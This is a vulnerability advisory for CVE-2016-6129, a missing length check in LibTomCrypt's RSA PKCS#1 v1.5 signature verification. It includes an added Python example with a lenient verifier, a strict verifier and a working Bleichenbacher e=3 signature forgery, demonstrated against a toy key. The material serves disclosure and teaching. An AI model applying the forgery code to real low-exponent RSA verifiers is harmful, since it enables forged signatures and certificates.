PT-2017-8916 · Libtom · Libtomcrypt

Sjaeckel · Published 2016-11-06 · Updated 2026-06-05 · CVE-2016-6129

CVSS v3.1: 7.5 High
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Name of the Vulnerable Software and Affected Versions: LibTomCrypt versions prior to 2.2.0; OP-TEE versions prior to 2.2.0
Description: The rsa_verify_hash_ex function in rsa_verify_hash.c does not check that the length of the decoded ASN.1 DigestInfo matches the length of the data recovered from the PKCS#1 v1.5 padded block, so any bytes trailing the hash are silently ignored. A remote attacker can exploit this with a Bleichenbacher low-exponent signature forgery (practical against public keys with a small exponent such as e = 3) to forge RSA signatures, and therefore public certificates, without access to the private key.
Recommendations: For LibTomCrypt versions prior to 2.2.0, update to version 2.2.0 or later. For OP-TEE versions prior to 2.2.0, update to version 2.2.0 or later. Until the fix can be deployed, do not rely on rsa_verify_hash_ex to verify PKCS#1 v1.5 signatures; the missing length check is inside the verifier, so callers cannot compensate for it by inspecting the message themselves. Where you control key generation, a public exponent of 65537 takes the Bleichenbacher forgery out of practical reach, but that is a mitigation, not a substitute for the update.
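The following Python script is an added worked example, not part of this advisory and not LibTomCrypt's code. It implements a deliberately simplified PKCS#1 v1.5 verifier with the same class of flaw (the DigestInfo and hash are read from the front of the block and trailing bytes are ignored), a corrected verifier that requires the encoded data to account for every byte after the padding separator, and Bleichenbacher's 2006 cube-root forgery against e = 3, which needs only the public key. The toy key generation, every function name and the sample message are assumptions made for the example; it uses only the standard library and does not reproduce LibTomCrypt's ASN.1 parsing.

```python
import hashlib
import hmac
import random
import secrets

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def _is_probable_prime(n, rounds=24):
    """Miller-Rabin: fine for an illustration, not for production keys."""
    if any(n % p == 0 for p in (3, 5, 7, 11, 13, 17, 19, 23, 29)):
        return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_key(bits=2048, e=3):
    """Toy keygen (assumed for the example); e=3 is deliberate, the forgery needs a low exponent."""
    def prime():
        while True:
            p = secrets.randbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if (p - 1) % e != 0 and _is_probable_prime(p):
                return p
    p, q = prime(), prime()
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))


def sign(msg, n, d):
    """EMSA-PKCS1-v1_5 block 00 01 FF..FF 00 DigestInfo||H(msg), then RSA with d."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    em = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(k, "big")


def _unpad(sig, n, e):
    """Apply the public key, strip 00 01 FF..FF 00, return what follows the separator."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if len(sig) != k or em[:2] != b"\x00\x01" or i < 10 or i >= k or em[i] != 0x00:
        return None   # wrong length, bad header, fewer than 8 padding bytes, or no separator
    return em[i + 1:]


def verify_lenient(msg, sig, n, e):
    """Vulnerable pattern: read DigestInfo and the hash from the front, ignore the rest."""
    t = _unpad(sig, n, e)
    if t is None or not t.startswith(SHA256_DIGESTINFO):
        return False
    h = hashlib.sha256(msg).digest()
    return t[len(SHA256_DIGESTINFO):len(SHA256_DIGESTINFO) + len(h)] == h


def verify_strict(msg, sig, n, e):
    """Fixed pattern: DigestInfo||H(msg) must account for every byte after the separator."""
    t = _unpad(sig, n, e)
    expected = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return t is not None and hmac.compare_digest(t, expected)   # length mismatch -> False


def _icbrt_ceil(x):
    """Smallest integer r with r ** 3 >= x (binary search)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        lo, hi = (mid + 1, hi) if mid ** 3 < x else (lo, mid)
    return lo


def forge_e3(msg, n):
    """Bleichenbacher (2006) forgery for e=3, no private key needed: put the shortest acceptable
    block at the top of the modulus, zeros below it, and take the integer cube root; cubing the
    root reproduces the prefix and leaves junk exactly where the lenient verifier never looks."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    tail = 8 * (k - len(prefix))
    s = _icbrt_ceil(int.from_bytes(prefix, "big") << tail)
    if s ** 3 >> tail != int.from_bytes(prefix, "big"):
        raise ValueError("modulus too short for the naive cube-root forgery")
    return s.to_bytes(k, "big")


def demo(bits=2048):
    """Returns {name: (lenient verdict, strict verdict)} for a genuine and a forged signature."""
    n, e, d = generate_key(bits, 3)
    msg = b"constructed sample message"   # constructed input, not taken from the advisory
    real, forged = sign(msg, n, d), forge_e3(msg, n)
    return {name: (verify_lenient(msg, sig, n, e), verify_strict(msg, sig, n, e))
            for name, sig in (("real", real), ("forged", forged))}
```

Calling demo() yields {'real': (True, True), 'forged': (True, False)}: both verifiers accept the genuine signature, only the lenient one accepts the forgery. The forgery needs enough low-order room under the modulus for the cube root to land on the wanted prefix (2048 bits is ample for SHA-256; with a 1024-bit key this naive variant fails and the script raises ValueError), and it has no analogue for e = 65537, which is why the practical impact is confined to low-exponent public keys.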

Fix

RCE

Weakness Enumeration

Related Identifiers

ALT-PU-2018-1027
CVE-2016-6129
DLA-612-1
MGASA-2016-0369

Affected Products

Alt Linux
Libtomcrypt
Op-Tee